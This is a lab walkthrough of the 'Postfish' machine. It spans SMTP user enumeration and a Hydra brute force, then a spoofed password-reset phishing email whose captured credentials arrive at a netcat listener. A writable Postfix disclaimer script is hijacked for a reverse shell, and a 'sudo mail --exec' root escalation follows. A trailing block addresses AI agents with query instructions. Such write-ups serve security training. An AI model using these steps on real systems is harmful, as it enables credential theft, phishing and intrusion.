# Postfish

## Nmap

```
sudo nmap 192.168.211.137 -p- -sS -sV -Pn

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp  open  smtp     Postfix smtpd
80/tcp  open  http     Apache httpd 2.4.41 ((Ubuntu))
110/tcp open  pop3     Dovecot pop3d
143/tcp open  imap     Dovecot imapd (Ubuntu)
993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp open  ssl/pop3 Dovecot pop3d
Service Info: Host:  postfish.off; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Heading straight into SMTP I ran `smtp-user-enum.pl` with the syntax below:

```
sudo perl smtp-user-enum.pl -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.211.137 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-955ab08a253628cdd054ee503bb70080b7b7a80c%2Fimage.png?alt=media)

Looks like we have some non default emails shown above that are listed below:

```
hr
sales
```

Checking our port 80 from here we find the web page attempts to direct us to <http://postfish.off>. We can add the IP and domain name into `/etc/hosts` to get this working. Once completed the web pages should load correctly.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0132657c2f04e83bb81ce3c741dd13f689e7a9d5%2Fimage.png?alt=media)

Checking out the link for 'Our Team' shows further departments and users.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-41ff83a3060decd40fff0fbd50ccdbc01f60992f%2Fimage.png?alt=media)

We can run the users against smtp-user-enum to try and identify further usernames. Companies generally use naming conventions so we will either try and guess it or use a tool to help us identify.

Download the following python script: <https://raw.githubusercontent.com/jseidl/usernamer/master/usernamer.py>

We can then run the script against each user and this will generate variations of the username.

```
python2 exploit.py -n 'USER'  
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ed53fa2b24510dba6ee52cf645c7746439df08ac%2Fimage.png?alt=media)

Repeat for each user and save the results into a text file. We can then run the variations against `smtp-user-enum` again.

```
perl smtp-user-enum.pl -M VRFY -U /home/kali/Desktop/known-users -t 192.168.211.137 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e257127ab9631c556d5788d1fe7b54029a4a634d%2Fimage.png?alt=media)

At this point I tried to brute force the various accounts we have over IMAP and POP3. I was able to get a valid result with Hydra for `sales:sales`.

The password list was generated with `cewl` from the <http://postfish.off/team.html> web page.

```
cewl -d 5 -m 3 http://postfish.off/team.html -w /home/kali/Desktop/cewl.txt
```

I then run our known users names with the output generated from `cewl` against `Hydra`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2910076bba4cf6b5e485128a36abf0d972a59561%2Fimage.png?alt=media)

I then logged into the sales account with telnet on port 110 for POP3 and was able to retrieve a singular email message.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-680e038801c49510f1d2eab12791cd2ae3c44d0c%2Fimage.png?alt=media)

The email indicates the IT team (<it@postfish.off>) will be sending password reset links to the sales team. From here we can potentially spear phish someone. Looking at <http://postfish.off/team.html> again shows that Brian Moore is the sales manager. We already know his email address from earlier as well from our smtp enumeration.

First set up a `netcat` listener on port 80.

```
sudo nc -lvp 80
```

Next connect to SMTP using `netcat` then do the following to compose an email from <it@postfish.off> to <brian.moore@postfish.off>.

```
nc -v postfish.off 25
```

```
helo test
MAIL FROM: it@postfish.off
RCPT TO: brian.moore@postfish.off
DATA

Subject: Password reset process

Hi Brian,

Please follow this link to reset your password: http://192.168.49.211/                              

Regards,

.

QUIT
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae02330537407af5b5cdf6adffe9e1acf8f6c14f%2Fimage.png?alt=media)

After a short while Brian will send us details regarding his current login to our `netcat` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-544dee1e3e40d566146e59ce5e1d72d30a297ac1%2Fimage.png?alt=media)

We now have the password `EternaLSunshinE` We can then login to `SSH`.

```
ssh brian.more@192.168.211.137
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dc6c9e247211f8ee580fcdd8fc14c45a3460bcef%2Fimage.png?alt=media)

I then transferred `linpeas` over to the target machine. After running we identify being a member of the 'filter' group which is a non default group. We also find /etc/postfix/disclaimer as being of interest.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4462113fe2ca6cb17570ea24d9b2f4f075c5e834%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ef00382f73706bad5aa59ae58703adec0416055a%2Fimage.png?alt=media)

A Google search on 'postfix disclaimer' results in the following being the first result on Google: <https://www.howtoforge.com/how-to-automatically-add-a-disclaimer-to-outgoing-emails-with-altermime-postfix-on-debian-squeeze>.

Looking through this it seems the admin on the box has followed the included steps to install and configure alterMIME to get disclaimers appended to emails.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4f92fb14bc9955dc6b467e804dbaf4e51a229330%2Fimage.png?alt=media)

Reading through the article essentially we see that for any emails included in the file `/etc/postfix/disclaimer_addresses`. When any of these addresses send or recieve an email the following file gets executed `/etc/postfix/disclaimer`. The file takes the contents of `/etc/postfix/disclaimer.txt` and appends it to the emails.

As we are a member the group 'filter' we can edit the script `/etc/postfix/disclaimer`. Using nano to edit the script I inserted a bash reverse shell to the top of the script.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-690c77c2ba88f0a3fc6efa4b494e770141c0c217%2Fimage.png?alt=media)

Then like we did earlier I connected to SMTP with `netcat` and sent an email to trigger the shell.

```
helo test
MAIL FROM: it@postfish.off
RCPT TO: brian.moore@postfish.off
DATA

Shell please

.

QUIT
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b94b839fed1eed990531c038fbe5444047e4ecc6%2Fimage.png?alt=media)

After doing so we should receive a shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ab40b7173d36671f6f6432b96e5b4b63d1bf5893%2Fimage.png?alt=media)

From here I checked sudo permissions with `sudo -l` and found that we can run the `mail` binary as any user without a password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-29fc3f7cde02ef9f0f157843cac83e9123f78593%2Fimage.png?alt=media)

Referring to [GTFOBins](https://gtfobins.github.io/gtfobins/mail/) we can use this to gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c476006b1c9f04bdf606bb3be7944b1171e233a1%2Fimage.png?alt=media)

```
sudo mail --exec='!/bin/bash'
```

We then gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a18e98cbb488f752e12f841b9c0863531680c1f3%2Fimage.png?alt=media)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/postfish.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.